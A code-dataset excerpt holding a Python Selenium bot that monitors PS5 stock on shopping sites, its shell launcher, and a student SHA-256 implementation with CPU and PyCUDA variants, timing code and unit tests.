notification_limit):\n can_send_notification = True\n notification_status.notification_sent()\n if notification_status.is_limited(notification_interval, notification_limit):\n limit_reached = True\n\n title = page.ID\n message = \" \".join([reason, price])\n\n if limit_reached:\n message = \"Limit reached! \" + message\n if not can_send_notification:\n message = \"Limited! 
\" + message\n logging.warning(\"Notification limit reached.\")\n\n print_text = \" | \".join([title, message])\n logging.info(print_text)\n\n if can_send_notification:\n notify(title, message, page.url)\n\ndef extract_text(element):\n text = ''.join(map(lambda x: x.text, element)).strip()\n return text\n\ndef stock_price_from_xpath(driver, page):\n # Wait until the stock element has loaded, then extract it\n try:\n wait = CONFIG_MANAGER.get_explicit_wait()\n el = WebDriverWait(driver, timeout=wait).until(lambda d: d.find_element_by_xpath(page.stock_xpath))\n except Exception:\n pass\n try:\n extracted_stock = extract_text(driver.find_elements_by_xpath(page.stock_xpath))\n extracted_price = extract_text(driver.find_elements_by_xpath(page.price_xpath))\n except StaleElementReferenceException:\n restart_program(page.ID, page.url)\n\n if CONFIG_MANAGER.verbose():\n logging.info(': '.join([page.ID, extracted_stock]))\n\n return (extracted_stock, extracted_price)\n\ndef page_broken(message, page_id, page_url):\n notification_status = get_page_notification_status(page_id)\n if notification_status.is_healthy():\n notification_status.unhealthy()\n notify(message, page_id, url=page_url)\n\ndef detect_amazon(page, stock, price):\n if stock == '':\n logging.warning(\"Amazon page empty stock element: \" + page.ID)\n page_broken(\"Empty stock element\", page.ID, page.url)\n return\n\n if sum(map(lambda x: x in stock, OUTOFSTOCK)) == 0:\n ps5_detected(page, stock, price)\n\n\n# def tryclickncheck(driver, button_xpath, stock_xpath, price_xpath, page_name):\n# def tryclick(driver, button_xpath):\n# try:\n# button = driver.find_element_by_xpath(button_xpath)\n# button.click()\n# return True\n# except NoSuchElementException:\n# exc, _, _ = sys.exc_info()\n# logging.warning(\"Button was not found: \" + str(exc))\n# return False\n# except Exception:\n# exc, _, _ = sys.exc_info()\n# logging.warning(\"Button could not be clicked: \" + str(exc))\n# return False\n#\n# try:\n# if not tryclick(driver, button_xpath):\n# logging.warning(\"Button click failed, skipping...\")\n# return False\n# time.sleep(randinrange(TIME_SLEEP_AFTER_CLICK_RANGE))\n# stock, price = stock_price_from_xpath(driver, stock_xpath, price_xpath)\n# detect_amazon(stock, price, page_name)\n# return True\n# except IndexError:\n# exc, _, _ = sys.exc_info()\n# logging.warning(\"Some element could not be found: \" + str(exc))\n# return False\n\ndef check_addtocart(driver, cart_xpath):\n if cart_xpath is not None:\n try:\n cart = driver.find_element_by_xpath(cart_xpath)\n driver.execute_script(\"arguments[0].click();\", cart)\n return True\n except NoSuchElementException:\n exc, _, _ = sys.exc_info()\n logging.warning(\"Cart button could not be found: \" + str(exc))\n return False\n except Exception:\n exc, _, _ = sys.exc_info()\n logging.warning(\"Cart button could not be found: \" + str(exc))\n return False\n else:\n return True\n\ndef restart_program(reason, page_url):\n notify(\"Restarting program.\", \"Reason: \" + reason, url=page_url)\n DRIVER.quit()\n VDISPLAY.stop()\n os.execl(sys.executable, os.path.abspath(__file__), *sys.argv)\n\nlogging.info(\"Starting loop...\")\nwhile True:\n start = time.time()\n CONFIG_MANAGER.update_config()\n NOTIFICATION_LIMITER.update_limits(CONFIG_MANAGER.get_notification_interval(), CONFIG_MANAGER.get_notification_limit())\n DRIVER.set_page_load_timeout(CONFIG_MANAGER.get_page_load_timeout())\n DRIVER.implicitly_wait(CONFIG_MANAGER.get_implicit_wait())\n for page in pages:\n if not 
CONFIG_MANAGER.page_enabled(page.ID):\n continue\n if page.test and (not CONFIG_MANAGER.test_enabled()):\n continue\n\n try:\n DRIVER.get(page.url)\n except TimeoutException:\n logging.warning(\"Selenium timeout for page: \" + page.ID)\n except InvalidSessionIdException:\n logging.error(\"InvalidSessionIdException. Restarting program.\")\n restart_program(page.ID, page.url)\n except:\n exc, _, _ = sys.exc_info()\n logging.error(\"Skipping page: \" + page.ID + ' due to ' + str(exc))\n continue\n\n\n # Amazon pages that need clicking to access PS5 page\n # if page.name in (PAGE_AMAZONDE):\n # if not tryclickncheck(driver, page.sed_button_xpath, page.stock_xpath, page.price_xpath, page.name):\n # logging.warning(\"Retrying Amazon click and check...\")\n # tryclickncheck(driver, page.sed_button_xpath, page.stock_xpath, page.price_xpath, page.name)\n\n # tryclickncheck(driver, page.ded_button_xpath, page.stock_xpath, page.price_xpath, page.name)\n # if not tryclickncheck(driver, page.ded_button_xpath, page.stock_xpath, page.price_xpath, page.name):\n # logging.warning(\"Retrying Amazon click and check...\")\n # tryclickncheck(driver, page.ded_button_xpath, page.stock_xpath, page.price_xpath, page.name)\n\n if isinstance(page, AmazonPage):\n stock, price = stock_price_from_xpath(DRIVER, page)\n detect_amazon(page, stock, price)\n\n elif page.name in (PAGE_TOPO, PAGE_TECHNO, PAGE_GAMEROOM):\n # Temporary solution when there are no PS5 pages in PAGE_TOPO\n # try:\n # msg = driver.find_element_by_xpath(page.stock_xpath).text\n # if 'parduota' not in msg:\n # ps5_detected('empty result', page.name, price, page.edition, page.url)\n # except:\n # ps5_detected('empty result', page.name, \"\", page.edition, page.url)\n # try:\n # msg = driver.find_element_by_xpath(page.price_xpath).text\n # if '17' not in msg:\n # ps5_detected('empty result', page.name, \"\", page.edition, page.url)\n # except:\n # ps5_detected('empty result', page.name, price, page.edition, page.url)\n stock, price = stock_price_from_xpath(DRIVER, page)\n if stock == '' and check_addtocart(DRIVER, page.cart_xpath):\n ps5_detected(page, 'empty result', price)\n\n time.sleep(CONFIG_MANAGER.get_cooldown())\n DRIVER.delete_all_cookies()\n end = time.time()\n logging.info(\"Loop pass completed (\" + str(round(end-start)) + \"s)\")\n" }, { "alpha_fraction": 0.6744186282157898, "alphanum_fraction": 0.6976743936538696, "avg_line_length": 16.200000762939453, "blob_id": "776e15cc9323a0668e59064402178ce6acc04471", "content_id": "b191241d1ea9f6bf25594fd90ee93769704b12f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 86, "license_type": "no_license", "max_line_length": 22, "num_lines": 5, "path": "/run-ps5.sh", "repo_name": "DomStan/ps5-bot", "src_encoding": "UTF-8", "text": "#!/usr/bin/bash\nrm -f ./logs/*\nrm geckodriver.log\nrm nohup.out\nnohup python3 ps5.py &\n" } ]
4
ChristopheBrown/HASH
https://github.com/ChristopheBrown/HASH
f89bd330c4fb24b91d849a132fb1f0eb5e33c127
10a5d7a9eea38d08ca181b2aca033468f6b548f6
6fe31e152f31d8952af260beca29bac6094b6d46
refs/heads/master
2020-09-23T06:44:50.299994
2019-12-15T21:06:50
2019-12-15T21:06:50
225,430,396
3
0
null
null
null
null
null
[ { "alpha_fraction": 0.5304428339004517, "alphanum_fraction": 0.566766619682312, "avg_line_length": 32.992156982421875, "blob_id": "cea7d5d005905c5b14c307ef4bfc0fe12c328660", "content_id": "da79532f27fcd0a1276ce312bb902a79da4292ff", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8672, "license_type": "permissive", "max_line_length": 110, "num_lines": 255, "path": "/gpu/helper_gpu.py", "repo_name": "ChristopheBrown/HASH", "src_encoding": "UTF-8", "text": "import helper\nimport logic\nimport pycuda.driver as cuda\nfrom pycuda import compiler, gpuarray, tools, cumath\nfrom pycuda.compiler import SourceModule\nimport pycuda.autoinit\nimport datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\n\n\n'''\nParallelize the following.\n\nAt this point in the algorithm, the message has been coverted to 8-bit binary\nrepresentation of the ASCII. This binary representation is put into one long string\nwhere (string_length % 512 = 0).\n\nThe string is then broken up into (string_length / 512) chunks.\n\nFor each chunk, there will be a copy, an extend, and a compress\n\nThe compress can only happen sequentially (not parallel) because there are dependencies\nbetween each consecutive iteration. The copy and extend, however, are not \nbound by this constraint\n\nPer the wikipedia article (https://en.wikipedia.org/wiki/SHA-2#Pseudocode), \nthe instructions here are as follows:\n\n create a 64-entry message schedule array w[0..63] of 32-bit words\n (copy) copy chunk into first 16 words w[0..15] of the message schedule array\n (extend) Extend the first 16 words into the remaining 48 words w[16..63] of the message schedule array\n \nThe for loop within copy (as seen in either the wiki article or the helper.py source code),\nsimply writes to [0:16) array locations individually, attention should be made to indexing properly\nOne thread per index is necessary - 16 threads\nAlternatively, if it's worth the marginal speed increase, one thread can be assigned per bit, i.e. 512 threads\n\nThe for loop within extend (as seen in either the wiki article or the helper.py source code),\nperforms several bitwise operations and writes to [16:64) array locations individually\nOne thread per index is necessary - 48 threads\nAlternatively, more threads can be used, e.g.:\n- each index is a threadIdx with a multiple of 10 (0, 10, 20, 30,...,)\n- each thread in between the multiples of hand a single bitwise operator\ni.e. 
threadIdx = 0 is responsible for index 16, threadIdx = 1 is responsible for s0_p1,\nthreadIdx = 2 is responsible for s0_p2, threadIdx = 3 is responsible for s0_p3 and so on.\nThe \"in-between\" threads calculate a value for the indexing threads to write back the final value\n\n'''\n\nclass HelperGPU(helper.Helper):\n\n def __init__(self, message=\"hello world\"):\n self.msg = message\n self.w = []\n self.h = []\n self.chunks = []\n for i in range(len(self.h_init)):\n self.h.append(self.extend_to_32_bit(bin(self.h_init[i])[2:]))\n \n self.copy_kernel_code = '''\n __global__ void copy_chunks(char* chunk, char* chunk_segment) {\n int tx = threadIdx.x;\n int ty = threadIdx.y;\n \n int index_32_bits = 32 * ty + tx;\n \n chunk_segment[index_32_bits] = chunk[index_32_bits]; \n } \n \n '''\n\n self.extend_kernel_code = ''' \n#include <stdio.h> \n\n#define ARR_SIZE 32\n\n__device__ void rotate_bits(char arr[], int n, char* rotated_array) \n{ \n for (int i=0; i < n; i++) { rotated_array[i] = arr[ARR_SIZE-n+i]; }\n for (int i=n; i<ARR_SIZE; i++) { rotated_array[i] = arr[i-n]; }\n // for (int i=0; i<ARR_SIZE; i++) { arr[i] = rotated_array[i]; }\n} \n\n__device__ void not_binary_string (char* arr, char* not_aray)\n{\n for (int i=0; i < ARR_SIZE; i++) {\n if (arr[i] == '0') not_aray[i] = '1';\n else if (arr[i] == '1') not_aray[i] = '0';\n }\n}\n\n__device__ void and_binary_strings(char a[], char b[], char* and_array)\n{\n for (int i=0; i < ARR_SIZE; i++) {\n if ((a[i] == '1') && (b[i] == '1')) { and_array[i] = '1'; }\n else { and_array[i] = '0'; }\n }\n}\n\n__device__ void shift_bits(char arr[], int n, char* shifted_array) {\n // char rotated_array[ARR_SIZE];\n for (int i=0; i < n; i++) { shifted_array[i] = '0'; }\n for (int i=n; i<ARR_SIZE; i++) { shifted_array[i] = arr[i-n]; }\n for (int i=0; i<ARR_SIZE; i++) { arr[i] = shifted_array[i]; }\n\n}\n \n__device__ void xor_binary_strings(char a[], char b[], char* xor_array) {\n for (int i=0; i < ARR_SIZE; i++) {\n int result = (int) (a[i] == '1') ^ (b[i] == '1');\n if (result) xor_array[i] = '1';\n else xor_array[i] = '0';\n \n }\n} \n\n__device__ void add_binary_strings(char a[], char b[], char* add_array) \n{\n char carry_out = '0';\n char write_back = '0';\n for( int i=ARR_SIZE-1; i>=0; i--) {\n if((a[i]=='1') && (b[i]=='1')) {\n if (carry_out == '1') {\n write_back = '1';\n carry_out = '1';\n } else if (carry_out == '0') {\n write_back = '0';\n carry_out = '1';\n }\n } else if ((a[i]=='1') || (b[i]=='1')) {\n if (carry_out == '1') {\n write_back = '0';\n carry_out = '1';\n } else if (carry_out == '0') {\n write_back = '1';\n carry_out = '0';\n }\n } else {\n if (carry_out == '1') {\n write_back = '1';\n carry_out = '0';\n } else if (carry_out == '0') {\n write_back = '0';\n carry_out = '0';\n }\n }\n add_array[i] = write_back;\n }\n} \n \n__global__ void extend_words(char* chunk_array) {\n \n\n \n} \n'''\n # compile the kernel code\n self.copy_kernel = compiler.SourceModule(self.copy_kernel_code)\n self.extend_kernel = compiler.SourceModule(self.extend_kernel_code)\n \n # get the kernel function from the compiled module\n self.copy = self.copy_kernel.get_function(\"copy_chunks\")\n self.extend = self.extend_kernel.get_function(\"extend_words\") \n \n\n\n def copy_chunk_bits(self, new_chunk=None):\n # self.w = ['0'*32] * 64\n self.w = np.chararray((64,),itemsize=32)\n if new_chunk is None:\n chunk = self.binary_msg_with_padding_and_length[0:512]\n else:\n chunk = new_chunk\n\n # chunk is now a string of length 512 binary chars\n # they need to be broken 
up into16 individual 32-bit ints\n\n \n input_512x1_bits = gpuarray.to_gpu(np.array([[chunk]], dtype=str))\n output_16x32_bits = gpuarray.to_gpu(self.w)\n \n \n self.copy(\n input_512x1_bits,\n output_16x32_bits, \n block=(32,16,1), \n grid=(1,1,1)\n ) \n \n self.w = output_16x32_bits.get()\n\n\n\n def extend_words(self):\n # I discovered late that the extension cannot be parallelized due to \n # dependencies in between the array indices\n \n #input_64x32_bits = gpuarray.to_gpu(self.w)\n \n #self.extend(\n # input_64x32_bits, \n # block=(32,64,64), \n # grid=(1,1,1)\n #) \n \n #self.w = input_64x32_bits.get()\n \n for i in range(16, 64): # now extend the rest of w[]\n s0_p1 = logic.rotate_bits(self.w[i-15], 7)\n s0_p2 = logic.rotate_bits(self.w[i-15], 18)\n s0_p3 = logic.shift_bits(self.w[i-15], 3)\n s0_xor1 = logic.xor_binary_strings(s0_p1, s0_p2)[2:]\n s0 = logic.xor_binary_strings(s0_xor1, s0_p3)\n s0 = self.extend_to_32_bit(s0)\n\n s1_p1 = logic.rotate_bits(self.w[i-2], 17)\n s1_p2 = logic.rotate_bits(self.w[i-2], 19)\n s1_p3 = logic.shift_bits(self.w[i-2], 10)\n s1_xor1 = logic.xor_binary_strings(s1_p1, s1_p2)[2:]\n s1 = logic.xor_binary_strings(s1_xor1, s1_p3)\n s1 = self.extend_to_32_bit(s1)\n\n add1 = logic.add_binary_strings(self.w[i-16], s0)\n add1 = self.extend_to_32_bit(add1)\n\n add2 = logic.add_binary_strings(self.w[i-7], s1)\n add2 = self.extend_to_32_bit(add2)\n\n\n w_i_no_padding = logic.add_binary_strings(add1, add2)\n w_i_no_padding = self.extend_to_32_bit(w_i_no_padding)\n\n\n # truncate overflow bits - cap at 32 bits\n w_i = logic.and_binary_strings(w_i_no_padding, '11111111111111111111111111111111')[2:]\n w_i = self.extend_to_32_bit(w_i)\n\n self.w[i] = w_i\n \n\n \n \n# bonus function for users who would like to see their system configuration\ndef dev_info():\n dev_data = pycuda.tools.DeviceData()\n\n print(\"CUDA device info\")\n print(\" - Max threads: {}\".format(dev_data.max_threads))\n print(\" - Thread blocks per mp: {}\".format(dev_data.thread_blocks_per_mp))\n print(\" - Shared memory: {}\".format(dev_data.shared_memory))\n print(\"\")\n\n return dev_data\n " }, { "alpha_fraction": 0.632290780544281, "alphanum_fraction": 0.6508875489234924, "avg_line_length": 26.511627197265625, "blob_id": "8331dcc5e3e89cedad9bdff3174cf4db64a158e7", "content_id": "2d936dce7d6c1d3beeef0847a038ae0d5ff1509a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1183, "license_type": "permissive", "max_line_length": 90, "num_lines": 43, "path": "/cpu/logic.py", "repo_name": "ChristopheBrown/HASH", "src_encoding": "UTF-8", "text": "def binary_string_to_binary_int(val):\n return int(val, base=2)\n\n\ndef rotate_bits(bits, amount):\n if amount >= len(bits): # more rotations than bits\n amount = amount % len(bits)\n\n # slice string in two parts for left and right\n early = bits[0: len(bits) - amount]\n late = bits[len(bits) - amount:]\n # concatenate two parts together\n return late + early\n\n\ndef shift_bits(bits, amount):\n shift = str(bin(binary_string_to_binary_int(bits) >> amount))\n if '0b' in shift: # [2:0] removes the '0b' on binary values\n shift = shift[2:]\n return shift\n\n\ndef xor_binary_strings(str1, str2):\n a = binary_string_to_binary_int(str1)\n b = binary_string_to_binary_int(str2)\n return bin(a ^ b)\n\n\ndef and_binary_strings(str1, str2):\n a = binary_string_to_binary_int(str1)\n b = binary_string_to_binary_int(str2)\n return bin(a & b)\n\n\ndef not_binary_string(str1):\n a = 
binary_string_to_binary_int(str1)\n return bin(~a & 0xFFFFFFFF) # mask result to avoid negatives (chars are not negative)\n\n\ndef add_binary_strings(str1, str2):\n a = binary_string_to_binary_int(str1)\n b = binary_string_to_binary_int(str2)\n return bin(a + b)\n" }, { "alpha_fraction": 0.507100522518158, "alphanum_fraction": 0.6601406335830688, "avg_line_length": 37.37036895751953, "blob_id": "5cb4d8db3a2fae5dfc11bc2c3049f04c6b96058f", "content_id": "41046ece6982484880affa88772155b27af855eb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7253, "license_type": "permissive", "max_line_length": 232, "num_lines": 189, "path": "/cpu/sha256_test.py", "repo_name": "ChristopheBrown/HASH", "src_encoding": "UTF-8", "text": "import unittest\nimport sha256\nimport helper\nimport logic\n\n\nclass MyTestCase(unittest.TestCase):\n def test_instance(self):\n sha = sha256.SHA256('Hello world!')\n self.assertIsNotNone(sha)\n\n def test_leading_zeros(self):\n h = helper.Helper()\n too_short = h.add_leading_zeros('1234')\n just_right = h.add_leading_zeros('12345678')\n too_long = h.add_leading_zeros('123456789')\n\n self.assertEqual(too_short, '00001234')\n self.assertEqual(just_right, '12345678')\n self.assertEqual(too_long, '0000000123456789')\n\n def test_convert_string_to_binary(self):\n h = helper.Helper()\n\n small = helper.Helper('a')\n medium = helper.Helper('example')\n large = helper.Helper('this is a long string!')\n\n small.convert_string_to_binary()\n medium.convert_string_to_binary()\n large.convert_string_to_binary()\n\n self.assertEqual(small.binary_msg_plus_one, '011000011')\n self.assertEqual(medium.binary_msg_plus_one, '011001010111100001100001011011010111000001101100011001011')\n self.assertEqual(large.binary_msg_plus_one, '011101000110100001101001011100110010000001101001011100110010000001100001001000000110110001101111011011100110011100100000011100110111010001110010011010010110111001100111001000011')\n\n def test_add_padding(self):\n small = helper.Helper('a')\n medium = helper.Helper('example' * 10)\n large = helper.Helper('this is a long string!' * 100)\n\n small.convert_string_to_binary()\n small.add_padding()\n\n medium.convert_string_to_binary()\n medium.add_padding()\n\n large.convert_string_to_binary()\n large.add_padding()\n\n # print(large.get_msg_length())\n\n self.assertEqual(len(small.binary_msg_with_padding_and_length) % 512, 0)\n self.assertEqual(len(medium.binary_msg_with_padding_and_length) % 512, 0)\n self.assertEqual(len(large.binary_msg_with_padding_and_length) % 512, 0)\n\n def test_breaking_into_chunks(self):\n large = helper.Helper('this is a long string!' * 100)\n large.convert_string_to_binary()\n large.add_padding()\n large.break_message_into_chunks()\n\n self.assertEqual(len(large.chunks), 35)\n\n # print(large.chunks)\n\n def test_copy_chunks(self):\n medium = helper.Helper('example' * 10)\n medium.convert_string_to_binary()\n medium.add_padding()\n medium.break_message_into_chunks()\n\n medium.copy_chunk_bits()\n for i in range(16):\n self.assertEqual(len(medium.w[i]), 32)\n\n small = helper.Helper('a')\n small.convert_string_to_binary()\n small.add_padding()\n small.break_message_into_chunks()\n\n small.copy_chunk_bits()\n for i in range(16):\n self.assertEqual(len(small.w[i]), 32)\n\n # Arithmetic/shift/rotate only tests ARITHMETIC - it does not check for aligned zeros (i.e. 
'0010' instead of '10')\n\n def test_rotate_bits(self):\n bits = '00101'\n rotated_bits = logic.rotate_bits(bits, 2) # shift right by 2 spaces\n excess_rotations = logic.rotate_bits(bits, 14) # more rotations than bits (cyclic)\n self.assertEqual(rotated_bits, '01001')\n self.assertEqual(excess_rotations, '01010')\n\n def test_shift_bits(self):\n bits = '10100'\n tiny_shift = logic.shift_bits(bits, 1) # test that zeros fill in\n big_shift = logic.shift_bits(bits, 3) # test drop-off of bits\n self.assertEqual(tiny_shift, '1010')\n self.assertEqual(big_shift, '10')\n\n def test_arithmetic(self):\n byte1 = '10101010'\n byte2 = '10010010'\n _xor = logic.xor_binary_strings(byte1, byte2)[2:]\n _xor = helper.Helper.add_leading_zeros(helper.Helper(), _xor)\n\n _and = logic.and_binary_strings(byte1, byte2)[2:]\n _and = helper.Helper.add_leading_zeros(helper.Helper(), _and)\n\n _not = logic.not_binary_string(byte1)[2:]\n\n _add = logic.add_binary_strings(byte1, byte2)[2:]\n\n self.assertEqual(_xor, '00111000')\n self.assertEqual(_and, '10000010')\n self.assertEqual(_not, '11111111111111111111111101010101')\n self.assertEqual(_add, '100111100')\n\n def test_extend_words(self):\n short = helper.Helper('abc')\n short.convert_string_to_binary()\n short.add_padding()\n short.break_message_into_chunks()\n\n short.copy_chunk_bits()\n short.extend_words()\n for i in range(64):\n self.assertEqual(len(short.w[i]), 32)\n\n # randomly-chosen assertions throughout w to validate the extension computation\n self.assertEqual(logic.binary_string_to_binary_int(short.w[16]), 1633837952)\n self.assertEqual(logic.binary_string_to_binary_int(short.w[43]), 657669027)\n self.assertEqual(logic.binary_string_to_binary_int(short.w[58]), 2682456414)\n\n def test_compress(self):\n short = helper.Helper('abc')\n short.convert_string_to_binary()\n short.add_padding()\n short.break_message_into_chunks()\n\n short.copy_chunk_bits()\n short.extend_words()\n short.compress()\n\n self.assertEqual(short.h[0], '10111010011110000001011010111111')\n self.assertEqual(short.h[1], '10001111000000011100111111101010')\n self.assertEqual(short.h[2], '01000001010000010100000011011110')\n self.assertEqual(short.h[3], '01011101101011100010001000100011')\n self.assertEqual(short.h[4], '10110000000000110110000110100011')\n self.assertEqual(short.h[5], '10010110000101110111101010011100')\n self.assertEqual(short.h[6], '10110100000100001111111101100001')\n self.assertEqual(short.h[7], '11110010000000000001010110101101')\n\n long = helper.Helper('abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq')\n long.convert_string_to_binary()\n long.add_padding()\n long.break_message_into_chunks()\n\n long.copy_chunk_bits()\n long.extend_words()\n long.compress()\n\n self.assertEqual(long.h[0], '10000101111001100101010111010110')\n self.assertEqual(long.h[1], '01000001011110100001011110010101')\n self.assertEqual(long.h[2], '00110011011000110011011101101010')\n self.assertEqual(long.h[3], '01100010010011001101111001011100')\n self.assertEqual(long.h[4], '01110110111000001001010110001001')\n self.assertEqual(long.h[5], '11001010110001011111100000010001')\n self.assertEqual(long.h[6], '11001100010010110011001011000001')\n self.assertEqual(long.h[7], '11110010000011100101001100111010')\n\n def test_digest(self):\n short = helper.Helper('abc')\n short.convert_string_to_binary()\n short.add_padding()\n short.break_message_into_chunks()\n\n long = helper.Helper('abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq')\n long.convert_string_to_binary()\n 
long.add_padding()\n long.break_message_into_chunks()\n\n self.assertEqual(short.digest(), 'ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad')\n self.assertEqual(long.digest(), '248d6a61d20638b8e5c026930c3e6039a33ce45964ff2167f6ecedd419db06c1')\n\n\nif __name__ == '__main__':\n unittest.main()\n\n" }, { "alpha_fraction": 0.5451016426086426, "alphanum_fraction": 0.5594884753227234, "avg_line_length": 34.9421501159668, "blob_id": "bc9128817625548f289562559d2e33639fe5c8a7", "content_id": "60733d309a0788297651359ec183fa8349cd9bbb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4379, "license_type": "permissive", "max_line_length": 92, "num_lines": 121, "path": "/gpu/sha256.py", "repo_name": "ChristopheBrown/HASH", "src_encoding": "UTF-8", "text": "import helper\nimport helper_gpu\nimport numpy as np\nimport time\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches \n\nclass SHA256:\n hasher = None\n msg = None\n chunks = None\n message_length = None\n\n def __init__(self, message, processor='cpu'):\n if (processor == 'cpu'):\n self.hasher = helper.Helper(message)\n elif (processor == 'gpu'):\n self.hasher = helper_gpu.HelperGPU(message)\n\n self.msg = message\n self.message_length = len(message)\n\n def preprocess(self):\n self.hasher.pre_process()\n self.msg = self.hasher.binary_msg_with_padding_and_length\n self.chunks = self.hasher.chunks\n\n def copy_chunks(self):\n self.hasher.copy_chunk_bits() \n self.hasher.extend_words()\n\n def compression_function(self): #comme\n self.hasher.compress()\n\n def digest(self):\n return self.hasher.digest()\n\n\nif __name__ == '__main__':\n message = 'the quick brown fox jumped over the lazy dog' \n \n hash_pre = time.time()\n s = SHA256(message, 'cpu')\n s.preprocess()\n print('(SHA-256) is: {}'.format(s.digest()))\n hash_post = time.time()\n print('Copy chunks finished in {} seconds'.format(s.hasher.timer))\n print('SHA (msg) generated in {} seconds'.format(hash_post-hash_pre))\n \n hash_pre = time.time()\n s = SHA256(message, 'gpu')\n s.preprocess()\n print('(SHA-256) is: {}'.format(s.digest()))\n hash_post = time.time()\n print('Copy chunks finished in {} seconds'.format(s.hasher.timer))\n print('SHA (msg) generated in {} seconds'.format(hash_post-hash_pre))\n \n files = [\"1kb.txt\" , \"10kb.txt\", \"100kb.txt\"]#,\"1mb.txt\", \"bible.txt\"]\n sizes = [\"1 KB\", \"10 KB\", \"100 KB\"]#, \"1 MB\", \"Bible\"]\n \n files_to_include = len(files)\n \n hash_times = np.zeros((files_to_include,2))\n copy_times = np.zeros((files_to_include,2))\n \n for i in range(len(files)):\n with open(files[i], 'r') as file:\n message = file.read().replace('\\n', '')\n \n hash_pre = time.time()\n s = SHA256(message, 'cpu')\n s.preprocess()\n print('(SHA-256) is: {}'.format(s.digest()))\n hash_post = time.time()\n hash_time = hash_post-hash_pre\n print('==========CPU==========')\n print('Copy chunks finished in {} seconds'.format(s.hasher.timer))\n print('SHA ({}) generated in {} seconds'.format(files[i],hash_post-hash_pre))\n \n hash_times[i][0] = hash_time\n copy_times[i][0] = s.hasher.timer\n \n with open(files[i], 'r') as file:\n message = file.read().replace('\\n', '')\n \n hash_pre = time.time()\n s = SHA256(message, 'gpu')\n s.preprocess()\n print('(SHA-256) is: {}'.format(s.digest()))\n hash_post = time.time()\n hash_time = hash_post-hash_pre\n print('==========GPU==========')\n print('Copy chunks finished in {} 
seconds'.format(s.hasher.timer))\n print('SHA ({}) generated in {} seconds'.format(files[i],hash_post-hash_pre)) \n \n hash_times[i][1] = hash_time\n copy_times[i][1] = s.hasher.timer\n \n \n \n scale_max = files_to_include\n mpl.style.use('seaborn')\n #plt.plot(range(0,scale_max),hash_times[:,0],'r',linewidth=2)\n #plt.plot(range(0,scale_max),hash_times[:,1],'b',linewidth=2)\n plt.plot(range(0,scale_max),copy_times[:,0],'c',linewidth=2)\n plt.plot(range(0,scale_max),copy_times[:,1],'y',linewidth=2)\n plt.title('Python vs PyCUDA')\n plt.ylabel('Execution Time (sec)')\n plt.xlabel('Size of Input Text File')\n x = np.array([0,1,2,3])\n plt.xticks(x, sizes)\n #plt.yscale('log')\n #cpu_plot_hash = mpatches.Patch(color='r', label='Total hash time (CPU)')\n #gpu_plot_hash = mpatches.Patch(color='b', label='Total hash time (GPU)')\n cpu_plot_copy = mpatches.Patch(color='c', label='Copy time (CPU)')\n gpu_plot_copy = mpatches.Patch(color='y', label='Copy time (GPU)')\n plt.legend(handles=[cpu_plot_copy, gpu_plot_copy]) # \n #plt.legend(handles=[cpu_plot_hash, gpu_plot_hash, cpu_plot_copy, gpu_plot_copy]) # \n plt.savefig('cuda_plot.png')\n plt.show() \n \n \n \n\n \n " }, { "alpha_fraction": 0.4500376284122467, "alphanum_fraction": 0.5633414387702942, "avg_line_length": 40.23793029785156, "blob_id": "b528c2381e1578307b491e6ea0463c9636496eb2", "content_id": "383f6a48803210eebdfb9fa99495ed05e648cd36", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11959, "license_type": "permissive", "max_line_length": 126, "num_lines": 290, "path": "/gpu/helper.py", "repo_name": "ChristopheBrown/HASH", "src_encoding": "UTF-8", "text": "\"\"\"\nThe helper.py file is the implementation of the algoirthm that can be found\non the wikipedia article here: https://en.wikipedia.org/wiki/SHA-2#Pseudocode\n\nYou will find similar naming schemes used from the wiki\n\n(c) Christophe Brown 2019\n\n\"\"\"\nimport logic\nimport time\n\n\nclass Helper:\n h_init = [0x6a09e667, 0xbb67ae85,\n 0x3c6ef372, 0xa54ff53a,\n 0x510e527f, 0x9b05688c,\n 0x1f83d9ab, 0x5be0cd19]\n\n k = [0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5,\n 0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174,\n 0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da,\n 0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967,\n 0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85,\n 0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070,\n 0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3,\n 0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2]\n\n msg = None\n binary_msg = None\n binary_msg_plus_one = None\n binary_msg_with_padding = None\n binary_msg_with_padding_and_length = None\n chunks = []\n w = []\n h = [] # this is iteratively updated later in the program\n\n digest = ''\n\n def __init__(self, message=\"hello world\"):\n self.msg = message\n self.w = []\n self.h = []\n self.chunks = []\n for i in range(len(self.h_init)):\n self.h.append(self.extend_to_32_bit(bin(self.h_init[i])[2:]))\n\n def add_leading_zeros(self, val):\n zeros_to_add = 8 - (len(val))\n if zeros_to_add < 